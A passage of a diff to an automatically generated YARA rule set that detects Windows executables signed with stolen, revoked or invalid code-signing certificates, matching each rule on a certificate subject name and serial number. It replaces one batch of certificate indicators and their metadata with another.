+		id = "0b0d815b-2232-5159-9b78-9227d9b2ec11"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6987-L6998"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1676-L1687"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a38d09beee8ddaa6e8273e04fe3c5cc9ff9a4e55344e2b9191bb3e5928e9e79b"
+		logic_hash = "de04f12b1fb1e12860bf4ac077b700d180b8d412890922b75264319559fbd997"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "80e8620ff16598cc1e157a2b7df17d528b03b6e5"
+		thumbprint = "6c7e917a2cc2b2228d6d4a0556bda6b2db9f06691749d2715af9a6a283ec987b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Logitech Z-" and pe.signatures [ i ] . serial == "66:39:0f:c1:77:86:d4:a3:42:f0:ee:89:99:6d:65:22" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kivaliz Prest s.r.l." and pe.signatures [ i ] . serial == "00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00D1737E5A94D2Aff121163Df177Ed7Cf7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_008Cff807Edaf368A60E4106906D8Df319 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "92ba22ba-9610-5b9b-9075-1da84fb148c1"
+		id = "ad8bed7f-3bc6-53d3-9e7a-0868e2ad267a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7000-L7015"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1689-L1700"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7889e42ca0bc6c4aad0c7cf90459958e9d256b984fae719bd418fc17120cb4a2"
+		logic_hash = "48752aff88cd3d546757a4220a64ca17cc9a5f00a42d2bc0571dedf5de769bc2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ed2e4f72e8cb9b008a28b31de440f024381e4c8d"
-		hash1 = "66dfb7c408d734edc2967d50244babae27e4268ea93aa0daa5e6bbace607024c"
+		thumbprint = "c97d809c73f376cdf8062329b357b16c9da9d14261895cd52400f845a2d6bdb1"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BedstSammen ApS" and ( pe.signatures [ i ] . serial == "d1:73:7e:5a:94:d2:af:f1:21:16:3d:f1:77:ed:7c:f7" or pe.signatures [ i ] . serial == "00:d1:73:7e:5a:94:d2:af:f1:21:16:3d:f1:77:ed:7c:f7" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KRAFT BOKS OOO" and pe.signatures [ i ] . serial == "00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5Aa94583A95D42F1 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2924785Fd7990B2D510675176Dae2Bed : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a77e58c7-c613-5416-9bcd-336c036d99bd"
+		id = "2aedb37c-8991-5750-b0c6-b9d6e7bb5e79"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7017-L7028"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1702-L1713"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "174ce032fd87028e34843417d5a4695d6d6e2eb444095e005588f1acf291cdf8"
+		logic_hash = "dbdd714575d3c5f9554026fea97c6e91073d30cf728396111a5106303bb7b624"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0b27715d7c78368bca3ac0bb829a7ceb19b3b5c3"
+		thumbprint = "adbc44fda783b5fa817f66147d911fb81a0e2032a1c1527d1b3adbe55f9d682d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UInt32" and pe.signatures [ i ] . serial == "5a:a9:45:83:a9:5d:42:f1" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Neoopt LLC" and pe.signatures [ i ] . serial == "29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6Ce7A0C62F27Fa98F78853E1Ad11173F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_F2C4B99487Ed33396D77029B477494Bc : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dd6ba685-deac-5ba0-8268-2ff17f3efc5a"
+		id = "594a5def-2516-5639-a72b-9b84b65de1e0"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7030-L7041"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1715-L1726"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48692213d57293d28d0eb146d24036fa7e7357e55df07330d596a51a0665f063"
+		logic_hash = "109d71674b652a2f42bb2a45c877d3a6cbfe280d0324f9ac8fa746d322440694"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "638dc7cd59f1d634c19e4fc2c41b38ae08a1d2e5"
+		thumbprint = "f38abffd259919d68969b8b2d265afac503a53dd"
 		importance = 20
 
 	condition:
-		( uint16( 0 ) == 0x5a4d or uint32( 0 ) == 0xe011cfd0 ) and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "D&K ENGINEERING" and pe.signatures [ i ] . serial == "6c:e7:a0:c6:2f:27:fa:98:f7:88:53:e1:ad:11:17:3f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bedaabaefadfdfedcbbbebaaef" and pe.signatures [ i ] . serial == "f2:c4:b9:94:87:ed:33:39:6d:77:02:9b:47:74:94:bc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_670C3494206B9F0C18714Fdcffaaa42F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_C54Cccff8Acceb9654B6F585E2442Ef7 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cbe10923-794e-50f0-bcc7-026ca2235836"
+		id = "c199b65f-5e95-5c6a-8ccc-7f343b867885"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7043-L7054"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1728-L1739"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5215f3e877ac4b37d33a29f9d2e92567db02f41f5fa1592d2de199ee06b43885"
+		logic_hash = "4be5e0f9f522f0d4096a63b001a02ea130ef56149dec7f0ac90be686b885cc4a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "59612473a9e23dc770f3a33b1ef83c02e3cfd4b6"
+		thumbprint = "416c79fccc5f42260cd227fd831b001aca14bf0d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADRIATIK PORT SERVIS, d.o.o." and pe.signatures [ i ] . serial == "67:0c:34:94:20:6b:9f:0c:18:71:4f:dc:ff:aa:a4:2f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eadbebdebcc" and pe.signatures [ i ] . serial == "c5:4c:cc:ff:8a:cc:eb:96:54:b6:f5:85:e2:44:2e:f7" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5F11C47D3F8C468E5D38279De98078Ce : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_690910Dc89D7857C3500Fb74Bed2B08D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d7ec5ceb-df6d-518c-977d-84ab2a40f6ed"
+		id = "d10931e2-8abb-592b-a070-3767f286bd74"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7056-L7067"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1741-L1752"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "82db6d0b96303be79aa9a0980a4ce491a1216adbba65443e8e59c5cf69a4a1e4"
+		logic_hash = "62a1be8435f73f3768030feb6b5917d9a8075e7abac52e654231ba9d16ccc374"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "29bbee51837dbc00c8e949ff2c0226d4bbb3722c"
+		thumbprint = "dfeb986812ba9f2af6d4ff94c5d1128fa50787951c07b4088f099a5701f1a1a4"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Atera Networks LTD." and pe.signatures [ i ] . serial == "5f:11:c4:7d:3f:8c:46:8e:5d:38:27:9d:e9:80:78:ce" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OLIMP STROI" and pe.signatures [ i ] . serial == "69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Bdb99D5Ecf8271D48E35F1039C2160Ef : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Af9B523180F34A24Fcfd11B74E7D6Cd : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a87a3295-fbdb-5501-97a1-7cb23009f925"
+		id = "d9ef3746-8b8e-5259-bcc4-408e27bc8ce3"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7069-L7083"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1754-L1765"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3a7fd1705d440306e7643167f46b0735bedab291e714cd01068be321f489e3f3"
+		logic_hash = "e06c87bddfc4fbb8918b7b1d64ec66b810a5a0c635c34d820b33c3cf9789229c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "331f96a1a187723eaa5b72c9d0115c1c57f08b66"
+		thumbprint = "c8aec622951068734d754dc2efd7032f9ac572e26081ac38b8ceb333ccc165c9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gavrilov Andrei Alekseevich" and ( pe.signatures [ i ] . serial == "bd:b9:9d:5e:cf:82:71:d4:8e:35:f1:03:9c:21:60:ef" or pe.signatures [ i ] . serial == "00:bd:b9:9d:5e:cf:82:71:d4:8e:35:f1:03:9c:21:60:ef" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORBIS LTD" and pe.signatures [ i ] . serial == "0a:f9:b5:23:18:0f:34:a2:4f:cf:d1:1b:74:e7:d6:cd" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_025020668F51235E9Ecfff8Cf00Da63E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00F4D2Def53Bccb0Dd2B7D54E4853A2Fc5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "5b9af281-09b0-5df5-af3b-4868a7243636"
+		id = "8c1970b7-10b5-5976-a89c-a0d30f4b04af"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7085-L7096"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1767-L1778"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c99caf6ada228fe1229ea8e8ca0b160468f044a9a1e13ed9a83c12afeae337a1"
+		logic_hash = "0d9813d79f86ff22d5478469bee6cf457afe3780dd4308caa5da502faf816377"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "59f82837fa672a81841d8fa4d3ba290395c10200"
+		thumbprint = "d5431403ba7b026666e72c675aac6c46720583a60320c5c2c0f74331fe845c35"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Knassar DK ApS" and pe.signatures [ i ] . serial == "02:50:20:66:8f:51:23:5e:9e:cf:ff:8c:f0:0d:a6:3e" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PETROYL GROUP, TOV" and pe.signatures [ i ] . serial == "00:f4:d2:de:f5:3b:cc:b0:dd:2b:7d:54:e4:85:3a:2f:c5" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Cfae7E6F538B9F2E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_56D576A062491Ea0A5877Ced418203A1 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c144fe64-ad45-5ac6-b2ee-904a66230674"
+		id = "94e29354-b6bc-5936-abc8-2b42d2e65294"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7098-L7112"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1780-L1791"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "23032d387bbfc81edb08982a196b90a136faf935d74c46771c59ef19095ac3a4"
+		logic_hash = "877b773cb1bdc6c6c309374e95dc7eac4d525c681200169fcf492476f6335342"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3152fc5298e42de08ed2dec23d8fefcaa531c771"
+		thumbprint = "b22e022f030cf1e760a7df84d22e78087f3ea2ed262a4b76c8b133871c58213b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SequenceDesigner" and ( pe.signatures [ i ] . serial == "cf:ae:7e:6f:53:8b:9f:2e" or pe.signatures [ i ] . serial == "00:cf:ae:7e:6f:53:8b:9f:2e" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Silvo LLC" and pe.signatures [ i ] . serial == "56:d5:76:a0:62:49:1e:a0:a5:87:7c:ed:41:82:03:a1" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Bc9B800F480691Bd6B60963466B0C75 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4152169F22454Ed604D03555B7Afb175 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ff76c8b3-8120-54ed-90e1-3ee01e57895e"
+		id = "61286549-7561-5607-9073-2a3ee0d54a44"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7114-L7125"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1793-L1804"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "15143a6dc374f22252880ce61a419df46d81bc1ee99a29d03a61348f9c230064"
+		logic_hash = "ee965ee8b6ebbb6171e3b10a7887acf35c9ed7fcbe49b7f403190c7fb046ec63"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8b6c4fc3d54f41ac137795e64477491c93bdf7f1"
+		thumbprint = "a1561cacd844fcb62e9e0a8ee93620b3b7d4c3f4bd6f3d6168129136471a7fdb"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HasCred ApS" and pe.signatures [ i ] . serial == "0b:c9:b8:00:f4:80:69:1b:d6:b6:09:63:46:6b:0c:75" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SMACKTECH SOFTWARE LIMITED" and pe.signatures [ i ] . serial == "41:52:16:9f:22:45:4e:d6:04:d0:35:55:b7:af:b1:75" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_69Ad1E8B5941C93D5017B7C3Fdb8E7B6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_41D05676E0D31908Be4Dead3486Aeae3 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4b961b30-dc0d-513c-8a66-ed8fe71f5439"
+		id = "d668f53b-3d1c-5fcb-9f9c-2923e63f93a9"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7127-L7138"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1806-L1817"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1a37133dcc7af9c3f229f517dca847d7c007b8a2fdc6af50721d68f68c5d9c20"
+		logic_hash = "e4eb406e433b38ac127ba22040c48b510636eb55e2b524b02386710709d343b6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "9b6f3b3cd33ae938fbc5c95b8c9239bac9f9f7bf"
+		thumbprint = "e6e597527853ee64b45d48897e3ca4331f6cc08a88cc57ff2045923e65461598"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Afia Wave Enterprises Oy" and pe.signatures [ i ] . serial == "69:ad:1e:8b:59:41:c9:3d:50:17:b7:c3:fd:b8:e7:b6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rov SP Z O O" and pe.signatures [ i ] . serial == "41:d0:56:76:e0:d3:19:08:be:4d:ea:d3:48:6a:ea:e3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_072472F2386F4608A0790Da2Be8A48F7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_13C7B92282Aae782Bfb00Baf879935F4 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "79f1e6da-003a-5291-a60c-7693ca2efbeb"
+		id = "244ff442-0bce-5f9f-85ea-33fafe9a2e7b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7140-L7151"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1819-L1830"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "32b61f42ee9f3109c747e8a159376d03349d8a5061be0c31504e929cb3c3042e"
+		logic_hash = "2742fd71eb8219db7785ad46be18a906fdab0914f632dfbf531238fd551a5b65"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e2a79e70b7a16a6fc2af7fbdc3d2cbfd3ef66978"
+		thumbprint = "c253cce2094c0a4ec403518d4fbf18c650e5434759bc690758cb3658b75c8baa"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FOXIT SOFTWARE INC." and pe.signatures [ i ] . serial == "07:24:72:f2:38:6f:46:08:a0:79:0d:a2:be:8a:48:f7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE WIZARD GIFT CORPORATION" and pe.signatures [ i ] . serial == "13:c7:b9:22:82:aa:e7:82:bf:b0:0b:af:87:99:35:f4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ea734E1Dfb6E69Ed2Bc55E513Bf95B5E : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00D627F1000D12485995514Bfbdefc55D9 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4e40ce70-d5d1-5719-bb43-40f860510093"
+		id = "dd18086c-063b-542e-915b-5bd452ee452e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7153-L7168"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1832-L1843"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e2d07a2af36608d6eab6db85bcb968e486293239d0cfaeea7de2bb8223e58a29"
+		logic_hash = "9ff60a73b889c8f1df127ead90a93fbf92131cfb475d58eea1ba1569f3e99e00"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5ca53cc5c6dc47838bbba922ad217a468408a9bd"
-		hash1 = "293a83bfe2839bfa6d40fa52f5088e43b62791c08343c3f4dade4f1118000392"
+		thumbprint = "5fac3a6484e93f62686e12de3611f7a5251009d541f65e8fe17decc780148052"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Postmarket LLC" and ( pe.signatures [ i ] . serial == "00:ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" or pe.signatures [ i ] . serial == "ea:73:4e:1d:fb:6e:69:ed:2b:c5:5e:51:3b:f9:5b:5e" ) )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THREE D CORPORATION PTY LTD" and pe.signatures [ i ] . serial == "00:d6:27:f1:00:0d:12:48:59:95:51:4b:fb:de:fc:55:d9" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Dfa4F0Cff90319951B019A4681Ebd2A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_62205361A758B00572D417Cba014F007 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bbb0be70-de74-5da9-80d2-2ba474b7f472"
+		id = "7838c733-7212-5e86-bb3c-5dfefb727a4b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7170-L7182"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1845-L1856"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d89cda38cf6149c004f7d7b307243567768cba73bd49979d7d4f92f902ef4508"
+		logic_hash = "52d67bc94e82bb9a36e969d393c395465c84ff76f89c5f8407c20e2c761000e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b85aacac6afb0bef5b6f1d744cd8c278030e6a3e"
-		hash1 = "4eca4e0d3c06e4889917a473229b368bae02f0135f0ac68e937a72fca431ac8a"
+		thumbprint = "83e851e8c50f9d7299363181f2275edc194037be8cb6710762d2099e0b3f31c6"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "deepinstruction O" and pe.signatures [ i ] . serial == "0d:fa:4f:0c:ff:90:31:99:51:b0:19:a4:68:1e:bd:2a" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UNITEKH-S, OOO" and pe.signatures [ i ] . serial == "62:20:53:61:a7:58:b0:05:72:d4:17:cb:a0:14:f0:07" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4D03Ae6512B85Eab4184Ca7F4Fa2E49C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_566Ac16A57B132D3F64Dced14De790Ee : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a7dc0a07-f295-5aff-9df0-71f27f0fe88c"
+		id = "05f49d36-7bf1-5bbc-b728-e1616366c15e"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7184-L7196"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1858-L1869"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2cbeaf65b0d3340df08baf67134a2fe0b26921f2e35ce541884209e3ecddf233"
+		logic_hash = "0618ce3ce0c5f8923c12a99586bbec8ec86229c7e08af75f5b0756f348d53bd5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0215ff94a5c0d97db82e11f87e0dfb4318acac38"
-		hash1 = "18bf017bdd74e8e8f5db5a4dd7ec3409021c7b0d2f125f05d728f3b740132015"
+		thumbprint = "2e44464a5907ac46981bebd8eed86d8deec9a4cfafdf1652c8ba68551d4443ff"
 		importance = 20
 
 	condition:
